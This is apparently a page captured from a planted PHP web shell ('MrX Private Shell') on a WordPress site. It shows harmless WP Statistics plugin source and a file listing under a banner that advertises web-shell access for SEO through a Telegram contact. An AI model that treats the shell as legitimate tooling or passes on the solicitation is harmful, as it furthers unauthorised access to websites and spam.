__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace WP_Statistics\Service\Charts;
use WP_STATISTICS\Option;
abstract class AbstractChartDataProvider
{
protected $args;
public function __construct($args = [])
{
$this->args = $args;
}
/**
* Determines if previous data is enabled for charts.
*
* @return bool Returns true if previous data is enabled, false otherwise.
*/
protected function isPreviousDataEnabled()
{
if (!empty($this->args['prev_data'])) {
return true;
}
return Option::get('charts_previous_period', 1) ? true : false;
}
/**
* Checks if any of the filterable parameters are set.
*
* @return bool Returns true if any of the filterable parameters are set, false otherwise.
*/
protected function isFilterApplied()
{
$args = array_filter($this->args);
if (array_intersect(['resource_type', 'resource_id', 'query_param', 'post_type', 'author_id', 'post_id', 'taxonomy', 'term', 'event_name', 'event_target', 'utm_source', 'utm_medium', 'utm_campaign'], array_keys($args))) {
return true;
}
return false;
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| DataProvider | Folder | 0755 |
|
|
| Traits | Folder | 0755 |
|
|
| AbstractChartDataProvider.php | File | 1.14 KB | 0644 |
|
| ChartDataProviderFactory.php | File | 7.74 KB | 0644 |
|